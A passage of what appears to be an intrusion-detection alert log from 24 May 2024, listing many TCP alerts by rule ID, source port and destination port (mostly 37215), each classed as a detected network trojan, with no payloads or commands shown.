              Timestamp:05/24/24-10:59:32.341407
              SID:2835222
              Source Port:43564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.429769
              SID:2829579
              Source Port:56746
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.460417
              SID:2835222
              Source Port:33606
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.991849
              SID:2835222
              Source Port:34966
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.059533
              SID:2835222
              Source Port:55458
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.878269
              SID:2829579
              Source Port:39906
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.882784
              SID:2829579
              Source Port:51540
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.245785
              SID:2829579
              Source Port:40568
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.153053
              SID:2829579
              Source Port:58326
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.536797
              SID:2829579
              Source Port:41838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.572578
              SID:2835222
              Source Port:54164
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.694701
              SID:2835222
              Source Port:39718
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.169135
              SID:2829579
              Source Port:47106
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.447213
              SID:2829579
              Source Port:59560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.481564
              SID:2835222
              Source Port:43180
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.208967
              SID:2835222
              Source Port:41100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.347078
              SID:2835222
              Source Port:38426
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.113327
              SID:2835222
              Source Port:33756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.394086
              SID:2835222
              Source Port:46870
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.112791
              SID:2835222
              Source Port:41208
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.803013
              SID:2835222
              Source Port:56846
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.424080
              SID:2835222
              Source Port:59644
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.481435
              SID:2829579
              Source Port:56456
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.575545
              SID:2835222
              Source Port:55104
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.727035
              SID:2835222
              Source Port:33424
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.166852
              SID:2835222
              Source Port:57414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.053112
              SID:2835222
              Source Port:51672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.592065
              SID:2829579
              Source Port:59842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.573290
              SID:2835222
              Source Port:60684
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.642203
              SID:2829579
              Source Port:54084
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.920548
              SID:2829579
              Source Port:34682
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.545033
              SID:2835222
              Source Port:37790
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.449112
              SID:2829579
              Source Port:34058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.116063
              SID:2829579
              Source Port:37030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.814707
              SID:2835222
              Source Port:42522
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.967227
              SID:2835222
              Source Port:56112
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.159747
              SID:2829579
              Source Port:56698
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.486160
              SID:2835222
              Source Port:56890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459788
              SID:2829579
              Source Port:37784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.432245
              SID:2829579
              Source Port:54552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.433678
              SID:2835222
              Source Port:53076
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.453658
              SID:2835222
              Source Port:41714
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.885923
              SID:2835222
              Source Port:59626
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.202977
              SID:2829579
              Source Port:40720
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.361016
              SID:2829579
              Source Port:48952
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.799004
              SID:2829579
              Source Port:39886
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.303285
              SID:2829579
              Source Port:59548
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.077862
              SID:2829579
              Source Port:48122
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.640288
              SID:2829579
              Source Port:60816
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.486968
              SID:2829579
              Source Port:52344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.989734
              SID:2835222
              Source Port:37302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.396086
              SID:2829579
              Source Port:51208
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.098082
              SID:2829579
              Source Port:38088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.111451
              SID:2829579
              Source Port:57494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.283379
              SID:2829579
              Source Port:44408
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.583953
              SID:2829579
              Source Port:51076
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.596594
              SID:2829579
              Source Port:40208
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.662596
              SID:2835222
              Source Port:57718
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.080515
              SID:2835222
              Source Port:47610
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624511
              SID:2829579
              Source Port:48652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.725983
              SID:2829579
              Source Port:38328
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.128674
              SID:2835222
              Source Port:54244
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.989504
              SID:2829579
              Source Port:45184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.550532
              SID:2829579
              Source Port:52884
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.055720
              SID:2829579
              Source Port:51846
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.327809
              SID:2829579
              Source Port:59786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.570634
              SID:2829579
              Source Port:33736
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.435286
              SID:2835222
              Source Port:51570
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.329456
              SID:2835222
              Source Port:53278
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.491503
              SID:2829579
              Source Port:40554
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.044754
              SID:2835222
              Source Port:60996
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.333983
              SID:2835222
              Source Port:33970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.404421
              SID:2829579
              Source Port:33368
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.398235
              SID:2835222
              Source Port:60244
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.553500
              SID:2835222
              Source Port:39190
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574089
              SID:2829579
              Source Port:50816
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574681
              SID:2829579
              Source Port:48288
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.819655
              SID:2829579
              Source Port:44972
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.287929
              SID:2829579
              Source Port:44330
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.828013
              SID:2829579
              Source Port:51026
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.638066
              SID:2835222
              Source Port:60916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.537749
              SID:2835222
              Source Port:57448
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.245566
              SID:2835222
              Source Port:34332
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.062372
              SID:2835222
              Source Port:36704
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.802384
              SID:2835222
              Source Port:37302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.799051
              SID:2835222
              Source Port:40386
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.332247
              SID:2829579
              Source Port:53728
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.186525
              SID:2835222
              Source Port:58922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.926854
              SID:2829579
              Source Port:55636
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.605807
              SID:2835222
              Source Port:51042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.551290
              SID:2829579
              Source Port:54430
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.154243
              SID:2829579
              Source Port:41016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.396163
              SID:2829579
              Source Port:43670
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.433569
              SID:2829579
              Source Port:49052
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.433769
              SID:2829579
              Source Port:55522
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.254182
              SID:2829579
              Source Port:55488
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.109474
              SID:2835222
              Source Port:49248
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.186028
              SID:2829579
              Source Port:53176
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.595013
              SID:2835222
              Source Port:48542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.725534
              SID:2829579
              Source Port:38780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.633537
              SID:2835222
              Source Port:46128
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:23.831285
              SID:2030490
              Source Port:42056
              Destination Port:1235
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.837255
              SID:2829579
              Source Port:44696
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.424260
              SID:2829579
              Source Port:37310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.694689
              SID:2835222
              Source Port:56532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.965820
              SID:2835222
              Source Port:33278
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.408853
              SID:2030490
              Source Port:39240
              Destination Port:1235
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.423373
              SID:2835222
              Source Port:35494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.112026
              SID:2829579
              Source Port:35398
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.477118
              SID:2835222
              Source Port:44908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.859979
              SID:2835222
              Source Port:46792
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.633958
              SID:2835222
              Source Port:58442
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.100509
              SID:2835222
              Source Port:54080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.552830
              SID:2835222
              Source Port:58058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.503305
              SID:2829579
              Source Port:57512
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.203013
              SID:2829579
              Source Port:60172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.826702
              SID:2829579
              Source Port:41936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.098709
              SID:2835222
              Source Port:38486
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.664407
              SID:2835222
              Source Port:38534
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.503815
              SID:2829579
              Source Port:45330
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.859609
              SID:2835222
              Source Port:38520
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.187048
              SID:2835222
              Source Port:49824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.625238
              SID:2829579
              Source Port:49280
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.582670
              SID:2835222
              Source Port:48408
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.428278
              SID:2829579
              Source Port:43944
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.549232
              SID:2829579
              Source Port:38230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.763876
              SID:2829579
              Source Port:52574
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.206405
              SID:2835222
              Source Port:51210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.266343
              SID:2829579
              Source Port:36934
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.671805
              SID:2829579
              Source Port:40074
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.364328
              SID:2829579
              Source Port:48394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.989754
              SID:2835222
              Source Port:44626
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.400611
              SID:2829579
              Source Port:52652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.859032
              SID:2835222
              Source Port:43244
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.574518
              SID:2829579
              Source Port:58500
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.526812
              SID:2835222
              Source Port:55408
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.061908
              SID:2835222
              Source Port:57524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.113681
              SID:2835222
              Source Port:49134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.516575
              SID:2829579
              Source Port:40752
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.308692
              SID:2835222
              Source Port:60534
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.285911
              SID:2829579
              Source Port:59104
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.545006
              SID:2835222
              Source Port:32918
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.303358
              SID:2835222
              Source Port:51560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.455433
              SID:2829579
              Source Port:50002
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.824663
              SID:2829579
              Source Port:41402
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.857817
              SID:2829579
              Source Port:36756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.048879
              SID:2829579
              Source Port:56048
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.433327
              SID:2835222
              Source Port:35608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574798
              SID:2835222
              Source Port:45608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.821961
              SID:2829579
              Source Port:38088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.574667
              SID:2835222
              Source Port:48010
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.208950
              SID:2829579
              Source Port:34016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.517182
              SID:2835222
              Source Port:49662
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.572717
              SID:2835222
              Source Port:48204
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.544207
              SID:2829579
              Source Port:35380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.432164
              SID:2835222
              Source Port:60460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.151137
              SID:2829579
              Source Port:33208
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.369076
              SID:2829579
              Source Port:37830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.623370
              SID:2835222
              Source Port:37912
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.725727
              SID:2829579
              Source Port:44356
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.872009
              SID:2835222
              Source Port:51274
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.162338
              SID:2835222
              Source Port:56668
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.463108
              SID:2829579
              Source Port:34846
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624445
              SID:2835222
              Source Port:35142
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.572382
              SID:2835222
              Source Port:54108
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.689654
              SID:2829579
              Source Port:56136
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.162901
              SID:2829579
              Source Port:53246
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.457852
              SID:2835222
              Source Port:54586
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.150786
              SID:2829579
              Source Port:37726
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.576454
              SID:2835222
              Source Port:52928
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.458276
              SID:2829579
              Source Port:38660
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.150928
              SID:2835222
              Source Port:46940
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.586050
              SID:2835222
              Source Port:41670
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.446996
              SID:2835222
              Source Port:40948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.457712
              SID:2835222
              Source Port:38318
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.640213
              SID:2829579
              Source Port:51686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.040672
              SID:2835222
              Source Port:57516
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.586940
              SID:2829579
              Source Port:48960
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.638290
              SID:2829579
              Source Port:45572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.726215
              SID:2835222
              Source Port:39824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.055309
              SID:2835222
              Source Port:36604
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.411277
              SID:2829579
              Source Port:40084
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.456248
              SID:2829579
              Source Port:60850
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.115251
              SID:2829579
              Source Port:44670
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.329691
              SID:2835222
              Source Port:43756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.578116
              SID:2835222
              Source Port:43030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.537777
              SID:2829579
              Source Port:42564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.537442
              SID:2829579
              Source Port:34274
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.727072
              SID:2829579
              Source Port:41000
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.727350
              SID:2829579
              Source Port:56160
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.755693
              SID:2835222
              Source Port:59320
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.147084
              SID:2829579
              Source Port:59880
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.360970
              SID:2835222
              Source Port:49284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.536570
              SID:2829579
              Source Port:52494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.634782
              SID:2829579
              Source Port:53182
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.425771
              SID:2829579
              Source Port:39512
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.452618
              SID:2835222
              Source Port:45422
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.918114
